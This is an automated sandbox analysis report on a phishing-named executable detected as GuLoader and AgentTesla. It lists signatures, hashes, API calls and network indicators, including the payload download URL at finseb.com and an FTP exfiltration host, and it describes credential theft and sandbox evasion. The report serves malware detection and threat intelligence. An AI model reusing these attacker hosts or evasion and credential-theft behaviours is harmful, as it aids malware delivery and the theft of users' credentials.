Windows Analysis Report
PO#4200000866.exe

Overview

General Information

Sample Name: PO#4200000866.exe
Analysis ID: 624323
MD5: 5d0444b70ff5caa4ec3b2ca2e563e724
SHA1: 27309fdae9005f71dcde3501f023819ae6dba6cb
SHA256: fd620fd2a9d5ca1dea1e11013eb4ec486f2f5cb340cd28bcbe39e78271fc5d26
Infos:

Detection

AgentTesla, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus detection for URL or domain
Yara detected GuLoader
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Found malware configuration
Source: 00000008.00000000.41902252759.0000000001120000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://finseb.com/qwer/COrg_ZBOJvB194.bin"}
Multi AV Scanner detection for submitted file
Source: PO#4200000866.exe Virustotal: Detection: 10% Perma Link
Antivirus detection for URL or domain
Source: ftp://ftp.solucionest.com.ar/log2 Avira URL Cloud: Label: malware
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_20809708 CryptUnprotectData, 8_2_20809708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080A128 CryptUnprotectData, 8_2_2080A128
Uses 32bit PE files
Source: PO#4200000866.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 131.226.4.8:443 -> 192.168.11.20:49761 version: TLS 1.2
Source: PO#4200000866.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr
Source: Binary string: D:\SourceCode\DevicePlugin\production_V4.2\Service\ServiceSDK\Release\DeviceServicePlugin\DeviceServicePlugin.pdb22 source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://finseb.com/qwer/COrg_ZBOJvB194.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNASSIGNED UNASSIGNED
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.finseb.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: finseb.comCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://ftp.solucionest.com.ar/log2
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 00000008.00000002.46739371983.000000001D9A6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000003.42144931318.000000001C661000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://EQDgdAvRkA6D7Crd.com
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: PO#4200000866.exe String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: PO#4200000866.exe String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: PO#4200000866.exe String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: CasPol.exe, 00000008.00000003.42075500608.0000000001472000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46716043130.0000000001463000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: CasPol.exe, 00000008.00000003.42075500608.0000000001472000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.46716043130.0000000001463000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://finseb.com/qwer/COrg_ZBOJvB194.bin
Source: PO#4200000866.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pXfISF.com
Source: PO#4200000866.exe String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: PO#4200000866.exe String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: PO#4200000866.exe String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: CasPol.exe, 00000008.00000002.46739371983.000000001D9A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: PO#4200000866.exe String found in binary or memory: http://subca.ocsp-certum.com01
Source: PO#4200000866.exe String found in binary or memory: http://subca.ocsp-certum.com02
Source: PO#4200000866.exe String found in binary or memory: http://subca.ocsp-certum.com05
Source: PO#4200000866.exe String found in binary or memory: http://www.certum.pl/CPS0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, iso_3166.xml.1.dr String found in binary or memory: http://www.iso.org/iso/country_codes
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: https://www.asus.com/campaign/aura/global/download.php
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.finseb.com/
Source: CasPol.exe, 00000008.00000002.46715489088.0000000001426000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.finseb.com/X
Source: CasPol.exe, 00000008.00000002.46715733863.0000000001446000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.finseb.com/qwer/COrg_ZBOJvB194.bin
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp, DeviceServicePlugin.dll.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: CasPol.exe, 00000008.00000002.46737865180.000000001D891000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown DNS traffic detected: queries for: finseb.com
Source: global traffic HTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: www.finseb.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /qwer/COrg_ZBOJvB194.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: finseb.comCache-Control: no-cache
Source: unknown HTTPS traffic detected: 131.226.4.8:443 -> 192.168.11.20:49761 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 1_2_00405809

System Summary
barindex
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: PO#4200000866.exe
Uses 32bit PE files
Source: PO#4200000866.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Detected potential crypto function
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_00406D5F 1_2_00406D5F
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_715D1BFF 1_2_715D1BFF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C822AF 1_2_03C822AF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C80A41 1_2_03C80A41
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71BC0 1_2_03C71BC0
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7ABC9 1_2_03C7ABC9
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77FC8 1_2_03C77FC8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C717D3 1_2_03C717D3
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71BFF 1_2_03C71BFF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C777FC 1_2_03C777FC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70F8E 1_2_03C70F8E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71B8A 1_2_03C71B8A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71796 1_2_03C71796
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71F94 1_2_03C71F94
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77F4D 1_2_03C77F4D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70F57 1_2_03C70F57
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71F54 1_2_03C71F54
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7175B 1_2_03C7175B
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C83362 1_2_03C83362
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71707 1_2_03C71707
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7AB0D 1_2_03C7AB0D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71B0C 1_2_03C71B0C
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71714 1_2_03C71714
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71F10 1_2_03C71F10
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70F1A 1_2_03C70F1A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C782C5 1_2_03C782C5
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C702C2 1_2_03C702C2
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77ED7 1_2_03C77ED7
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71ED0 1_2_03C71ED0
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71ADC 1_2_03C71ADC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C832E6 1_2_03C832E6
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C716E8 1_2_03C716E8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C76A82 1_2_03C76A82
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71E9F 1_2_03C71E9F
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71AAA 1_2_03C71AAA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77EA8 1_2_03C77EA8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70EB8 1_2_03C70EB8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70240 1_2_03C70240
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B64A 1_2_03C7B64A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71A69 1_2_03C71A69
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71E68 1_2_03C71E68
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A67E 1_2_03C7A67E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7027D 1_2_03C7027D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7AA7D 1_2_03C7AA7D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71A23 1_2_03C71A23
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A9CA 1_2_03C7A9CA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C84DC7 1_2_03C84DC7
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71DEF 1_2_03C71DEF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C719EB 1_2_03C719EB
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7018E 1_2_03C7018E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71DB2 1_2_03C71DB2
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A9B9 1_2_03C7A9B9
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C78156 1_2_03C78156
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71967 1_2_03C71967
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71965 1_2_03C71965
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B56E 1_2_03C7B56E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A96C 1_2_03C7A96C
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71D6A 1_2_03C71D6A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C76D71 1_2_03C76D71
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70100 1_2_03C70100
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7AD11 1_2_03C7AD11
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B52E 1_2_03C7B52E
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71931 1_2_03C71931
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7793D 1_2_03C7793D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7ACCA 1_2_03C7ACCA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A8DD 1_2_03C7A8DD
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A0E2 1_2_03C7A0E2
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C778E1 1_2_03C778E1
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C718EA 1_2_03C718EA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B4F7 1_2_03C7B4F7
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71CF5 1_2_03C71CF5
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7A8F3 1_2_03C7A8F3
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B080 1_2_03C7B080
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7788D 1_2_03C7788D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7788B 1_2_03C7788B
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C77092 1_2_03C77092
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7189A 1_2_03C7189A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C780A9 1_2_03C780A9
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C718A8 1_2_03C718A8
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71CB4 1_2_03C71CB4
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C700BC 1_2_03C700BC
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C700BA 1_2_03C700BA
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7104D 1_2_03C7104D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7AC77 1_2_03C7AC77
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71C73 1_2_03C71C73
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70072 1_2_03C70072
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71872 1_2_03C71872
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7B003 1_2_03C7B003
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C70001 1_2_03C70001
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7000B 1_2_03C7000B
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7100B 1_2_03C7100B
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71809 1_2_03C71809
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C8283A 1_2_03C8283A
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7003D 1_2_03C7003D
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C7183C 1_2_03C7183C
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C71C39 1_2_03C71C39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_0104F740 8_2_0104F740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_010437C0 8_2_010437C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_0104DE28 8_2_0104DE28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_01042A70 8_2_01042A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6B6B63 8_2_1D6B6B63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6BA160 8_2_1D6BA160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6B9890 8_2_1D6B9890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_1D6B9548 8_2_1D6B9548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_20806088 8_2_20806088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080D9F0 8_2_2080D9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_20800B13 8_2_20800B13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080B458 8_2_2080B458
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080DD90 8_2_2080DD90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080F118 8_2_2080F118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_2080ED40 8_2_2080ED40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 8_2_20807260 8_2_20807260
Contains functionality to call native functions
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C842AE NtProtectVirtualMemory, 1_2_03C842AE
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C822AF NtAllocateVirtualMemory, 1_2_03C822AF
Source: C:\Users\user\Desktop\PO#4200000866.exe Code function: 1_2_03C84890 NtResumeThread, 1_2_03C84890
PE file does not import any functions
Source: library.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: PO#4200000866.exe, 00000001.00000002.42100146180.0000000002935000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDeviceServicePlugin.dllL vs PO#4200000866.exe
PE file contains strange resources
Source: PO#4200000866.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\PO#4200000866.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll Jump to behavior
PE / OLE file has an invalid certificate
Source: PO#4200000866.exe Static PE information: invalid certificate
Source: library.dll.1.dr Static PE information: Section .rsrc
Source: PO#4200000866.exe Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\PO#4200000866.exe File read: C:\Users\user\Desktop\PO#4200000866.exe Jump to behavior
Source: PO#4200000866.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PO#4200000866.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PO#4200000866.exe "C:\Users\user\Desktop\PO#4200000866.exe"
